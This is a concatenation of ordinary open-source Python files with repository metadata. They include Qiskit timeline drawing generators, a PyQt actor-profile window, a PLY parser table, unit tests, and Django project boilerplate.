k.add_inhomogeneous_mechanisms(mod=False)
k.add_homogeneous_mechanisms(mod=False)
k.add_ion_properties()
proj.add_cell(k.cell)
|
[
"borismarin@gmail.com"
] |
borismarin@gmail.com
|
e92d908cafaecefeb041446ec37ddd3296fec8b7
|
819b50e6cbdbe937950930c23cbc291f64599273
|
/main.py
|
b395bda86b77e9ef8165b49ac0cd1f6d6cdaf6fa
|
[] |
no_license
|
heyandresdjc/moc-data
|
60264ddf9ec758557634d0a56fd3cd1be15124b7
|
de3bc8e40deb520958d2d65243a95677a901673c
|
refs/heads/master
| 2021-06-13T20:01:33.585442
| 2019-03-25T18:13:45
| 2019-03-25T18:13:45
| 157,810,915
| 0
| 0
| null | 2021-03-20T00:43:06
| 2018-11-16T04:04:32
|
Python
|
UTF-8
|
Python
| false
| false
| 759
|
py
|
from random import choice
from string import ascii_letters as A_Z
import csv
CONDITION = [ "AR", "SV", "OH", "RD", "NS", "NE", "FN"]
def random_string(num):
return_str = ""
for _ in range(num):
return_str += choice(A_Z)
return return_str
for _ in range(100000):
part = {
"part number": random_string(10),
"serial number": random_string(10),
"description": random_string(200),
"condition": choice(CONDITION),
"quantity": 1,
"price": 0
}
with open("andres.csv", "a") as csv_file:
fieldnames = ["part number", "serial number", "description", "condition", "quantity", "price"]
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writerow(part)
|
[
"heyandresdjc@gmail.com"
] |
heyandresdjc@gmail.com
|
d6f19ff2bd531ee3d26e6b95468c8885edf1352f
|
c00d2cdeb15a159a10aed2ebbe3b15f52ee4ee97
|
/setup.py
|
b73ce184e47212962d9c5ab40ca4a67b0715e09c
|
[
"Unlicense"
] |
permissive
|
lwerdna/z80dis
|
6b76bd2ee5d38ffe09389329726add561cff5e8b
|
c1e11aed5a5f00c40c07d838f0fdcd282840d0b5
|
refs/heads/master
| 2020-07-02T13:19:05.986553
| 2020-05-01T15:14:49
| 2020-05-01T15:14:49
| 201,533,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 607
|
py
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="z80dis",
version="1.0.6",
author="Andrew Lamoureux",
author_email="foo@bar.com",
description="Z80 disassembler library",
long_description=long_description, # load from README.md
long_description_content_type="text/markdown",
url="https://github.com/lwerdna/z80dis",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: Public Domain",
"Operating System :: OS Independent",
],
)
|
[
"andrew@vector35.com"
] |
andrew@vector35.com
|
af803e00daf212de7d6cb712d1518f29f7f5bc7b
|
c078a5fe353c417ad514dbff49ba49a496a0c4a7
|
/manage.py
|
aec9870339a2465a79e30a15dec0bb5ea3e1f514
|
[] |
no_license
|
zofy/TicTacToe
|
7215f1b8be1ad1ff775b31fbf0152cf5383df71f
|
0eada26ae04a4a172548f5e4a5ccf4791104e541
|
refs/heads/master
| 2022-12-13T11:00:01.925715
| 2021-06-11T07:31:50
| 2021-06-11T07:31:50
| 50,509,892
| 0
| 0
| null | 2022-12-07T23:36:12
| 2016-01-27T13:41:46
|
HTML
|
UTF-8
|
Python
| false
| false
| 252
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "TicTacToe.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"zofy11@gmail.com"
] |
zofy11@gmail.com
|
1bcdfe43cc927df5d11f1e47e7f8c7a24a54ce3f
|
273484a9dc7778e2c0310befcf65506e60b468c0
|
/neurolab/optimization/metric/__init__.py
|
e11ae9604fd4147e3ff6b787719c542742621216
|
[
"MIT"
] |
permissive
|
GabrieleLagani/HebbianLearning
|
942a44778abbaccc14bc624887b5d96c6506bfa5
|
a7ed2f8a5925426880b5c315a7caf1ef1891001a
|
refs/heads/master
| 2023-02-14T22:47:07.220429
| 2023-01-23T11:31:32
| 2023-01-23T11:31:32
| 219,447,087
| 15
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
from .crossent import *
from .mse import *
from .acc import *
from .topkacc import *
from .prec import *
from .map import *
from .elbo import *
from .crossent_elbo import *
|
[
"gabriele.lagani@gmail.com"
] |
gabriele.lagani@gmail.com
|
6967a05257a0d60c9f402aaefed8478edcb70175
|
94c8dd4126da6e9fe9acb2d1769e1c24abe195d3
|
/qiskit/visualization/timeline/generators.py
|
a21a6433dbcd447be2c4e9a077425b0e8d9bcd55
|
[
"Apache-2.0"
] |
permissive
|
levbishop/qiskit-terra
|
a75c2f96586768c12b51a117f9ccb7398b52843d
|
98130dd6158d1f1474e44dd5aeacbc619174ad63
|
refs/heads/master
| 2023-07-19T19:00:53.483204
| 2021-04-20T16:30:16
| 2021-04-20T16:30:16
| 181,052,828
| 1
| 0
|
Apache-2.0
| 2019-06-05T15:32:13
| 2019-04-12T17:20:54
|
Python
|
UTF-8
|
Python
| false
| false
| 15,283
|
py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
A collection of functions that generate drawings from formatted input data.
See :py:mod:`~qiskit.visualization.timeline.types` for more info on the required data.
An end-user can write arbitrary functions that generate custom drawings.
Generators in this module are called with the `formatter` kwarg. This data provides
the stylesheet configuration.
There are 4 types of generators in this module.
1. generator.gates
In this stylesheet entry the input data is `types.ScheduledGate` and generates gate objects
such as time buckets and gate name annotations.
The function signature of the generator is restricted to:
```python
def my_object_generator(
gate: types.ScheduledGate,
formatter: Dict[str, Any]) -> List[ElementaryData]:
# your code here: create and return drawings related to the gate object.
```
2. generator.bits
In this stylesheet entry the input data is `types.Bits` and generates timeline objects
such as zero line and name of bit associated with the timeline.
The function signature of the generator is restricted to:
```python
def my_object_generator(
bit: types.Bits,
formatter: Dict[str, Any]) -> List[ElementaryData]:
# your code here: create and return drawings related to the bit object.
```
3. generator.barriers
In this stylesheet entry the input data is `types.Barrier` and generates barrier objects
such as barrier lines.
The function signature of the generator is restricted to:
```python
def my_object_generator(
barrier: types.Barrier,
formatter: Dict[str, Any]) -> List[ElementaryData]:
# your code here: create and return drawings related to the barrier object.
```
4. generator.gate_links
In this stylesheet entry the input data is `types.GateLink` and generates barrier objects
such as barrier lines.
The function signature of the generator is restricted to:
```python
def my_object_generator(
link: types.GateLink,
formatter: Dict[str, Any]) -> List[ElementaryData]:
# your code here: create and return drawings related to the link object.
```
Arbitrary generator function satisfying the above format can be accepted.
Returned `ElementaryData` can be arbitrary subclasses that are implemented in
the plotter API.
"""
import warnings
from typing import List, Union, Dict, Any
from qiskit.circuit.exceptions import CircuitError
from qiskit.visualization.timeline import types, drawings
def gen_sched_gate(gate: types.ScheduledGate,
formatter: Dict[str, Any],
) -> List[Union[drawings.TextData, drawings.BoxData]]:
"""Generate time bucket or symbol of scheduled gate.
If gate duration is zero or frame change a symbol is generated instead of time box.
The face color of gates depends on the operand type.
Stylesheet:
- The `gate` style is applied for finite duration gate.
- The `frame_change` style is applied for zero duration gate.
- The `gate_face_color` style is applied for face color.
Args:
gate: Gate information source.
formatter: Dictionary of stylesheet settings.
Returns:
List of `TextData` or `BoxData` drawings.
"""
try:
unitary = str(gate.operand.to_matrix())
except (AttributeError, CircuitError):
unitary = 'n/a'
try:
label = gate.operand.label or 'n/a'
except AttributeError:
label = 'n/a'
with warnings.catch_warnings():
warnings.simplefilter("ignore")
meta = {
'name': gate.operand.name,
'label': label,
'bits': ', '.join([bit.register.name for bit in gate.bits]),
't0': gate.t0,
'duration': gate.duration,
'unitary': unitary,
'parameters': ', '.join(map(str, gate.operand.params))
}
# find color
color = formatter['color.gates'].get(gate.operand.name, formatter['color.default_gate'])
if gate.duration > 0:
# gate with finite duration pulse
styles = {
'zorder': formatter['layer.gate'],
'facecolor': color,
'alpha': formatter['alpha.gate'],
'linewidth': formatter['line_width.gate']
}
# assign special name to delay for filtering
if gate.operand.name == 'delay':
data_type = types.BoxType.DELAY
else:
data_type = types.BoxType.SCHED_GATE
drawing = drawings.BoxData(data_type=data_type,
xvals=[gate.t0, gate.t0 + gate.duration],
yvals=[-0.5 * formatter['box_height.gate'],
0.5 * formatter['box_height.gate']],
bit=gate.bits[gate.bit_position],
meta=meta,
styles=styles)
else:
# frame change
styles = {
'zorder': formatter['layer.frame_change'],
'color': color,
'size': formatter['text_size.frame_change'],
'va': 'center',
'ha': 'center'
}
unicode_symbol = formatter['unicode_symbol.frame_change']
latex_symbol = formatter['latex_symbol.frame_change']
drawing = drawings.TextData(data_type=types.SymbolType.FRAME,
bit=gate.bits[gate.bit_position],
xval=gate.t0,
yval=0,
text=unicode_symbol,
latex=latex_symbol,
styles=styles)
return [drawing]
def gen_full_gate_name(gate: types.ScheduledGate,
formatter: Dict[str, Any]
) -> List[drawings.TextData]:
"""Generate gate name.
Parameters and associated bits are also shown.
Stylesheet:
- `gate_name` style is applied.
- `gate_latex_repr` key is used to find the latex representation of the gate name.
Args:
gate: Gate information source.
formatter: Dictionary of stylesheet settings.
Returns:
List of `TextData` drawings.
"""
if gate.duration > 0:
# gate with finite duration pulse
v_align = 'center'
v_pos = 0
else:
# frame change
v_align = 'bottom'
v_pos = formatter['label_offset.frame_change']
styles = {
'zorder': formatter['layer.gate_name'],
'color': formatter['color.gate_name'],
'size': formatter['text_size.gate_name'],
'va': v_align,
'ha': 'center'
}
# find latex representation
default_name = r'{{\rm {name}}}'.format(name=gate.operand.name)
latex_name = formatter['latex_symbol.gates'].get(gate.operand.name, default_name)
label_plain = '{name}'.format(name=gate.operand.name)
label_latex = r'{name}'.format(name=latex_name)
# bit index
with warnings.catch_warnings():
warnings.simplefilter("ignore")
if len(gate.bits) > 1:
bits_str = ', '.join(map(str, [bit.index for bit in gate.bits]))
label_plain += '[{bits}]'.format(bits=bits_str)
label_latex += '[{bits}]'.format(bits=bits_str)
# parameter list
params = []
for val in gate.operand.params:
try:
params.append('{val:.2f}'.format(val=float(val)))
except ValueError:
params.append('{val}'.format(val=val))
params_str = ', '.join(params)
if params_str and gate.operand.name != 'delay':
label_plain += '({params})'.format(params=params_str)
label_latex += '({params})'.format(params=params_str)
# duration
if gate.duration > 0:
label_plain += '[{dur}]'.format(dur=gate.duration)
label_latex += '[{dur}]'.format(dur=gate.duration)
# assign special name to delay for filtering
if gate.operand.name == 'delay':
data_type = types.LabelType.DELAY
else:
data_type = types.LabelType.GATE_NAME
drawing = drawings.TextData(data_type=data_type,
xval=gate.t0 + 0.5 * gate.duration,
yval=v_pos,
bit=gate.bits[gate.bit_position],
text=label_plain,
latex=label_latex,
styles=styles)
return [drawing]
def gen_short_gate_name(gate: types.ScheduledGate,
formatter: Dict[str, Any]
) -> List[drawings.TextData]:
"""Generate gate name.
Only operand name is shown.
Stylesheet:
- `gate_name` style is applied.
- `gate_latex_repr` key is used to find the latex representation of the gate name.
Args:
gate: Gate information source.
formatter: Dictionary of stylesheet settings.
Returns:
List of `TextData` drawings.
"""
if gate.duration > 0:
# gate with finite duration pulse
v_align = 'center'
v_pos = 0
else:
# frame change
v_align = 'bottom'
v_pos = formatter['label_offset.frame_change']
styles = {
'zorder': formatter['layer.gate_name'],
'color': formatter['color.gate_name'],
'size': formatter['text_size.gate_name'],
'va': v_align,
'ha': 'center'
}
# find latex representation
default_name = r'{{\rm {name}}}'.format(name=gate.operand.name)
latex_name = formatter['latex_symbol.gates'].get(gate.operand.name, default_name)
label_plain = '{name}'.format(name=gate.operand.name)
label_latex = '{name}'.format(name=latex_name)
# assign special name for delay to filtering
if gate.operand.name == 'delay':
data_type = types.LabelType.DELAY
else:
data_type = types.LabelType.GATE_NAME
drawing = drawings.TextData(data_type=data_type,
xval=gate.t0 + 0.5 * gate.duration,
yval=v_pos,
bit=gate.bits[gate.bit_position],
text=label_plain,
latex=label_latex,
styles=styles)
return [drawing]
def gen_timeslot(bit: types.Bits,
formatter: Dict[str, Any]
) -> List[drawings.BoxData]:
"""Generate time slot of associated bit.
Stylesheet:
- `timeslot` style is applied.
Args:
bit: Bit object associated to this drawing.
formatter: Dictionary of stylesheet settings.
Returns:
List of `BoxData` drawings.
"""
styles = {
'zorder': formatter['layer.timeslot'],
'alpha': formatter['alpha.timeslot'],
'linewidth': formatter['line_width.timeslot'],
'facecolor': formatter['color.timeslot']
}
drawing = drawings.BoxData(data_type=types.BoxType.TIMELINE,
xvals=[types.AbstractCoordinate.LEFT,
types.AbstractCoordinate.RIGHT],
yvals=[-0.5 * formatter['box_height.timeslot'],
0.5 * formatter['box_height.timeslot']],
bit=bit,
styles=styles)
return [drawing]
def gen_bit_name(bit: types.Bits,
formatter: Dict[str, Any]
) -> List[drawings.TextData]:
"""Generate bit label.
Stylesheet:
- `bit_name` style is applied.
Args:
bit: Bit object associated to this drawing.
formatter: Dictionary of stylesheet settings.
Returns:
List of `TextData` drawings.
"""
styles = {
'zorder': formatter['layer.bit_name'],
'color': formatter['color.bit_name'],
'size': formatter['text_size.bit_name'],
'va': 'center',
'ha': 'right'
}
with warnings.catch_warnings():
warnings.simplefilter("ignore")
label_plain = '{name}'.format(name=bit.register.name)
label_latex = r'{{\rm {register}}}_{{{index}}}'.format(register=bit.register.prefix,
index=bit.index)
drawing = drawings.TextData(data_type=types.LabelType.BIT_NAME,
xval=types.AbstractCoordinate.LEFT,
yval=0,
bit=bit,
text=label_plain,
latex=label_latex,
styles=styles)
return [drawing]
def gen_barrier(barrier: types.Barrier,
formatter: Dict[str, Any]
) -> List[drawings.LineData]:
"""Generate barrier line.
Stylesheet:
- `barrier` style is applied.
Args:
barrier: Barrier instruction.
formatter: Dictionary of stylesheet settings.
Returns:
List of `LineData` drawings.
"""
styles = {
'alpha': formatter['alpha.barrier'],
'zorder': formatter['layer.barrier'],
'linewidth': formatter['line_width.barrier'],
'linestyle': formatter['line_style.barrier'],
'color': formatter['color.barrier']
}
drawing = drawings.LineData(data_type=types.LineType.BARRIER,
xvals=[barrier.t0, barrier.t0],
yvals=[-0.5, 0.5],
bit=barrier.bits[barrier.bit_position],
styles=styles)
return [drawing]
def gen_gate_link(link: types.GateLink,
formatter: Dict[str, Any]
) -> List[drawings.GateLinkData]:
"""Generate gate link line.
Line color depends on the operand type.
Stylesheet:
- `gate_link` style is applied.
- The `gate_face_color` style is applied for line color.
Args:
link: Gate link object.
formatter: Dictionary of stylesheet settings.
Returns:
List of `GateLinkData` drawings.
"""
# find line color
color = formatter['color.gates'].get(link.opname, formatter['color.default_gate'])
styles = {
'alpha': formatter['alpha.gate_link'],
'zorder': formatter['layer.gate_link'],
'linewidth': formatter['line_width.gate_link'],
'linestyle': formatter['line_style.gate_link'],
'color': color
}
drawing = drawings.GateLinkData(bits=link.bits,
xval=link.t0,
styles=styles)
return [drawing]
|
[
"noreply@github.com"
] |
levbishop.noreply@github.com
|
bdb1af6cfd3542d9d233b67bf76a802451af8e38
|
bf413d16c87db978c4abfe7cfaf8c18b1054469f
|
/program/tests/test_witness_complex.py
|
b5dca06d326a6c9344c4baee4a13d007beccba80
|
[] |
no_license
|
ilonatommy/ShapeVis
|
b7289d63f81fd9aafefcd7337f7cb52242f4ffd0
|
c9f4aaaaaa57130df4dc579cf7f7d23efa05fca6
|
refs/heads/master
| 2022-11-23T11:31:39.596675
| 2020-07-14T20:21:46
| 2020-07-14T20:21:46
| 260,666,710
| 0
| 0
| null | 2020-07-14T20:21:47
| 2020-05-02T10:50:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,754
|
py
|
import unittest
from unittest.mock import patch, Mock
import numpy as np
from source.witness_complex import WitnessComplexGraphBuilder
from source.randomizer import Randomizer
from source.data_processor import DataProcessor
from source.algo_comparer import AlgoComparer
TEST_DATA = np.array([[1, 1.5], [1.75, 1.75], [2.5, 0.5], [0,0], [3,2], [1.25, 0]])
TEST_LABELS = np.array([0, 1, 1, 0, 1, 0])
TEST_CLASSES = range(2)
TEST_SAMPLES_IDXS = [1, 0, 5]
TEST_SAMPLES = [np.array([1.75, 1.75]), np.array([1. , 1.5]), np.array([1.25, 0. ])]
class TestWitnessComplex(unittest.TestCase):
@patch('source.randomizer.Randomizer')
def setUp(self, MockRandomizer):
mock_randomizer = MockRandomizer.return_value
expected_nodes = TEST_SAMPLES
mock_randomizer.sample.return_value = TEST_SAMPLES_IDXS
stub_data_processor = DataProcessor()
stub_data_processor.data = TEST_DATA
stub_data_processor.labels = TEST_LABELS
stub_data_processor.names = TEST_CLASSES
self.sut = WitnessComplexGraphBuilder(stub_data_processor, len(TEST_SAMPLES))
def test_knn_graph_creation(self):
self.sut.build_knn()
expected_edges = [('[1.75 1.75]', '[1. 1.5]'), ('[1. 1.5]', '[1.25 0. ]')]
edges = self.sut.get_graph().edges
np.testing.assert_array_equal(edges, expected_edges)
def test_knn_augmentation(self):
self.sut.build_knn()
self.sut.build_augmented_knn()
expected_edges = [('[1.75 1.75]', '[1. 1.5]'), ('[1.75 1.75]', '[1.25 0. ]'), ('[1. 1.5]', '[1.25 0. ]')]
edges = self.sut.get_graph().edges
np.testing.assert_array_equal(edges, expected_edges)
if __name__ == '__main__':
unittest.main()
|
[
"mactob25@gmail.com"
] |
mactob25@gmail.com
|
b824778aad03d683ce7f0228878aefb56b70c1bc
|
37d6315233f39d2fc465be29365f1e8c96a69231
|
/hocs/parsetab.py
|
7c49fdf5308298e44cce8a3f3af5dfb6d4e15f00
|
[] |
no_license
|
asdf1234Damian/Compilers
|
e759600a0803819ff1109a575f91d54716af276b
|
a74776c344bfc1abcc348415220e5e8bd02152da
|
refs/heads/master
| 2020-04-19T08:11:15.952573
| 2019-06-05T14:16:01
| 2019-06-05T14:16:01
| 168,068,271
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,169
|
py
|
# parsetab.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'rightEQUALSleftPLUSMINUSleftPORDIVIDEDIVIDE EQUALS LPAR MINUS NUMBER PLUS POR RPAR VARexpr : NUMBERexpr : VARexpr : VAR EQUALS exprexpr : expr PLUS exprexpr : expr MINUS exprexpr : expr POR exprexpr : expr DIVIDE exprexpr : LPAR expr RPARexpr : MINUS expr'
_lr_action_items = {'NUMBER':([0,4,5,6,7,8,9,10,],[2,2,2,2,2,2,2,2,]),'VAR':([0,4,5,6,7,8,9,10,],[3,3,3,3,3,3,3,3,]),'LPAR':([0,4,5,6,7,8,9,10,],[5,5,5,5,5,5,5,5,]),'MINUS':([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,],[4,7,-1,-2,4,4,4,4,4,4,4,-9,7,-4,-5,-6,-7,7,-8,]),'$end':([1,2,3,11,13,14,15,16,17,18,],[0,-1,-2,-9,-4,-5,-6,-7,-3,-8,]),'PLUS':([1,2,3,11,12,13,14,15,16,17,18,],[6,-1,-2,-9,6,-4,-5,-6,-7,6,-8,]),'POR':([1,2,3,11,12,13,14,15,16,17,18,],[8,-1,-2,8,8,8,8,-6,-7,8,-8,]),'DIVIDE':([1,2,3,11,12,13,14,15,16,17,18,],[9,-1,-2,9,9,9,9,-6,-7,9,-8,]),'RPAR':([2,3,11,12,13,14,15,16,17,18,],[-1,-2,-9,18,-4,-5,-6,-7,-3,-8,]),'EQUALS':([3,],[10,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = {}
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'expr':([0,4,5,6,7,8,9,10,],[1,11,12,13,14,15,16,17,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
for _x, _y in zip(_v[0], _v[1]):
if not _x in _lr_goto: _lr_goto[_x] = {}
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> expr","S'",1,None,None,None),
('expr -> NUMBER','expr',1,'p_num','hoc2.py',17),
('expr -> VAR','expr',1,'p_var','hoc2.py',21),
('expr -> VAR EQUALS expr','expr',3,'p_var_equals_exp','hoc2.py',25),
('expr -> expr PLUS expr','expr',3,'p_exp_plus_exp','hoc2.py',30),
('expr -> expr MINUS expr','expr',3,'p_exp_min_exp','hoc2.py',34),
('expr -> expr POR expr','expr',3,'p_exp_por_exp','hoc2.py',38),
('expr -> expr DIVIDE expr','expr',3,'p_exp_div_exp','hoc2.py',42),
('expr -> LPAR expr RPAR','expr',3,'p_par_exp_par','hoc2.py',49),
('expr -> MINUS expr','expr',2,'p_min_exp','hoc2.py',53),
]
|
[
"memoriasnaranjo98@gmail.com"
] |
memoriasnaranjo98@gmail.com
|
8c323d87fbb43ffa0517dd1c18f8fe1239c01308
|
d489e64a7ccb20be9289b460ee5de9d55bca3e32
|
/src/controller/actorWindow.py
|
0990f71b5ab2c1c58783ef6f62e3bd0601e05cc0
|
[] |
no_license
|
John-Dilla/imdbScraper
|
1d77cbda80281c99f8eae17cbc9f3e93e11cfbd0
|
2ce53c3cfaa518f647cde234130fda1cef3e09fd
|
refs/heads/main
| 2023-05-27T01:21:03.417367
| 2021-06-11T11:52:36
| 2021-06-11T11:52:36
| 360,892,223
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,567
|
py
|
from os.path import abspath
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QWidget
from PyQt5 import QtCore, QtWidgets
from PyQt5 import uic
from PyQt5.QtGui import QPixmap
import pandas as pd
from src.controller.model import PandasModel
from src.scraper.scrapeController import Controller
import src.utility.fileHandler as io
import src.utility.tableHandler as th
class Actor(QWidget):
"""The class to show the window for an actor or actress.
Args:
QWidget (QWidget): The type of the window.
"""
def __init__(self, actorID: str) -> None:
"""Initializes the UI window of an actor or actress.
Args:
actorID (str): The IMDB-ID of an actor or actress.
"""
super().__init__()
self._actorID = actorID
self._modelRatings = None
try:
PandasModel(th.ratingPerYear(actorID))
except OSError:
# database for this actor is empty
print("Actor or Actress has not been scraped before.")
_scraper = Controller("")
_scraper.scrapeSingleActor(actorID)
self._modelRatings = PandasModel(th.ratingPerYear(actorID))
self._dfGenres = io.getTable("filmography", "genre_"+actorID)
self._modelGenres = PandasModel(self._dfGenres)
self._dfAwards = io.getTable("awards", actorID)
self._modelAwards = PandasModel(self._dfAwards)
self._dfMovies = io.getTable("filmography", actorID)
self._modelMovies = PandasModel(self._dfMovies)
self._modelTop5 = PandasModel(th.top5Movie(actorID))
# Load the .ui file
pathUI = io.getUIPath(abspath(__file__), "actorWindow.ui")
uic.loadUi(pathUI, self)
# Set the text for all the bio information labels
dfBio = io.getTable("biography", actorID)
name = "Name: \n" + str(dfBio.iloc[0]["Birthname"])
self.uiName.setText(name)
icon = io.getUIPath(abspath(__file__), "rating.ico")
rating = "Overall rating: <br>" + str(th.ratingOverall(actorID))
self.uiRating.setText("<html>"+rating+" <img src='"+icon+"'></html>")
# Place of birth
place = "Place of Birth: \n" + str(dfBio.iloc[0]["Place of birth"])
self.uiPlace.setText(place)
# Date of birth
birth = "Date of Birth: \n" + str(dfBio.iloc[0]["Date of birth"])
self.uiDate.setText(birth)
if not pd.isnull(dfBio.iloc[0]["Spouse"]):
# Spouse. Also there must be a new line for each spouse
tempListSpouse = str(dfBio.iloc[0]["Spouse"]).split('|')
spouse = "Spouse: \n" + '\n'.join(tempListSpouse)
self.uiSpouse.setText(spouse)
else:
# Hide spouse label if NaN
self.uiSpouse.setVisible(False)
# Height
height = "Height: \n" + str(dfBio.iloc[0]["Height"])
self.uiHeight.setText(height)
# Set biography
self.textBiography.setText(dfBio.iloc[0]["Bio"])
self.textBiography.setReadOnly(True)
# Set profile picture
pixmap = QPixmap(io.getPicture(actorID))
pixmap = pixmap.scaled(200, 200, Qt.KeepAspectRatio, Qt.SmoothTransformation)
self.picture.setPixmap(pixmap)
# Initialize movie table
self._setupTableMovies()
self.checkTop5.stateChanged.connect(self._clickBox)
# Initialize award table
self._setupTableAwards()
# Initialize genre table
self._setupTableGenres()
# Initialize overall rating table
self._setupTableRating()
self.show()
def _setupTableAwards(self) -> None:
"""Private function to set up the award table.
"""
self.tableAwards.setModel(self._modelAwards)
self._generalTableSetup(self.tableAwards)
self.tableAwards.setColumnHidden(0, True)
def _setupTableMovies(self) -> None:
"""Private function to set up the movie table.
"""
self.tableMovies.setModel(self._modelMovies)
self._generalTableSetup(self.tableMovies)
self.tableMovies.setColumnHidden(0, True)
# hide the movie plot
self.tableMovies.setColumnHidden(8, True)
#plot = table column 8
self.moviePlot.setVisible(False)
self.moviePlot.setReadOnly(True)
# Reacts on all table selection changes
self.tableMovies.selectionModel().selectionChanged.connect(self._showPlot)
def _showPlot(self):
"""Private function to outsource the plot of a movie in a seperate widget.
Also, this function tracks the selected row and changes the plot accordingly.
If the plot is not available, the box is set to setVisible(False).
"""
# Use model
model = self.tableMovies.model()
# Get first selected row
row = self.tableMovies.selectedIndexes()[0].row()
if not pd.isnull(model._df.iloc[row]["Plot"]):
plot = model._df.iloc[row]["Plot"]
self.moviePlot.setText(plot)
self.moviePlot.setVisible(True)
else:
self.moviePlot.setVisible(False)
def _setupTableTop5(self):
"""Private function to set up the top 5 movie table.
"""
self.tableMovies.setModel(self._modelTop5)
self._generalTableSetup(self.tableMovies)
def _setupTableGenres(self):
"""Private function to set up the genre table.
"""
self.tableGenres.setModel(self._modelGenres)
self._generalTableSetup(self.tableGenres)
self.tableGenres.setColumnHidden(0, True)
def _setupTableRating(self):
"""Private function to set up the rating per year table.
"""
self.tableRating.setModel(self._modelRatings)
self._generalTableSetup(self.tableRating)
def _generalTableSetup(self, table):
"""Private function to set up the general properties of any table.
"""
table.setSelectionBehavior(table.SelectRows)
header = table.horizontalHeader()
header.setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)
def _clickBox(self, state):
"""Private function to set up a checkbox.
Implemented to toggle between the movie table and the top 5 movie table.
"""
self.moviePlot.setVisible(False)
if state == QtCore.Qt.Checked:
print('Checked')
self._setupTableTop5()
else:
print('Unchecked')
self._setupTableMovies()
|
[
"yungdillaa@gmail.com"
] |
yungdillaa@gmail.com
|
38b811ade0043def5ed94ffae3ed49ec7b0d3f3f
|
dbd96086e5d882df0f1e0c3637cad7f7a4588e73
|
/django_projects/settings.py
|
896e03e9dd162c138d60203962e4919c82fe6fa5
|
[] |
no_license
|
gusguma/django-projects-model
|
c649d28b5962cb5480dee33b6cd395c0e499201c
|
0947823a18c0f5f4bfa438fe317e1616b1d454c6
|
refs/heads/master
| 2020-11-24T07:12:22.867145
| 2019-12-14T12:58:52
| 2019-12-14T12:58:52
| 228,023,585
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,204
|
py
|
"""
Django settings for django_projects project.
Generated by 'django-admin startproject' using Django 3.0.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'op2)=1w_13u#4)8dd9a&$&b@*5xsye=6=e$s5#^ivp!!-0fm^z'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_pruebas.apps.DjangoPruebasConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_projects.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_projects.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"gusguma@gmail.com"
] |
gusguma@gmail.com
|
